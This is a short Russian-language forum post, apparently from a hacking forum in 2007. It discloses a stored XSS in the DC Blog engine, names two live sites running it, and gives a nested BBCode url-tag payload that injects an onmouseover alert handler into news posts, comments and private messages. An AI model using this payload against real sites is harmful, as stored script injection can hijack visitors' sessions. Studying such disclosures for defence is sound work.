Тема: DC Blog Active XSS
Показать сообщение отдельно

DC Blog Active XSS
  #1  
Старый 20.10.2007, 05:21
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


Talking DC Blog Active XSS

Пример блога:
sovserv.ru/dc/
kpnemo.ru


Делать нечего...искал дырки..
Скули не нашел..
Накорябал активку...ток на самом деле устал подбирать, а код оказался легкий..

Активка работает везде, где можно писать
Хоть пишите новость(активка на главной) , хоть комментарий (в теме), хоть ЛС...

Код:
[*url=][*url=onmouseover='alert("XSS")'][/url][/url]
 
Ответить с цитированием